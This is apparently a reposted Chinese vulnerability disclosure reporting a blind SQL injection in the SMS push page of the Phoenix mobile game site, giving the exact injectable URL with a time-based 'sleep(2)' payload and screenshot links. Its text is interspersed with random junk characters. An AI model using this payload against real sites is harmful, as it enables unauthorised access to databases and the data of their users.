简要描述:2 ?: M6 o4 U4 z# l5 e3 r
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
# I0 U: K/ R; y6 [* [: w6 \" R. K" ~& v" S" k7 r8 n
详细说明:
4 s: o, l7 D l4 G- x存在SQL盲注url:; E" r' [3 y5 b- O6 F) D8 p. ]
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
: K; Y- y, D- n& mhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
# O4 L5 \, ]" [8 r0 X# b# nhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png8 S: m9 e7 z5 h o
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg2 A; ^; Z: ~/ e# I
& H, Q. o/ d# h( R
能看到mysql系统数据库,看来user权限应该很高的。。 |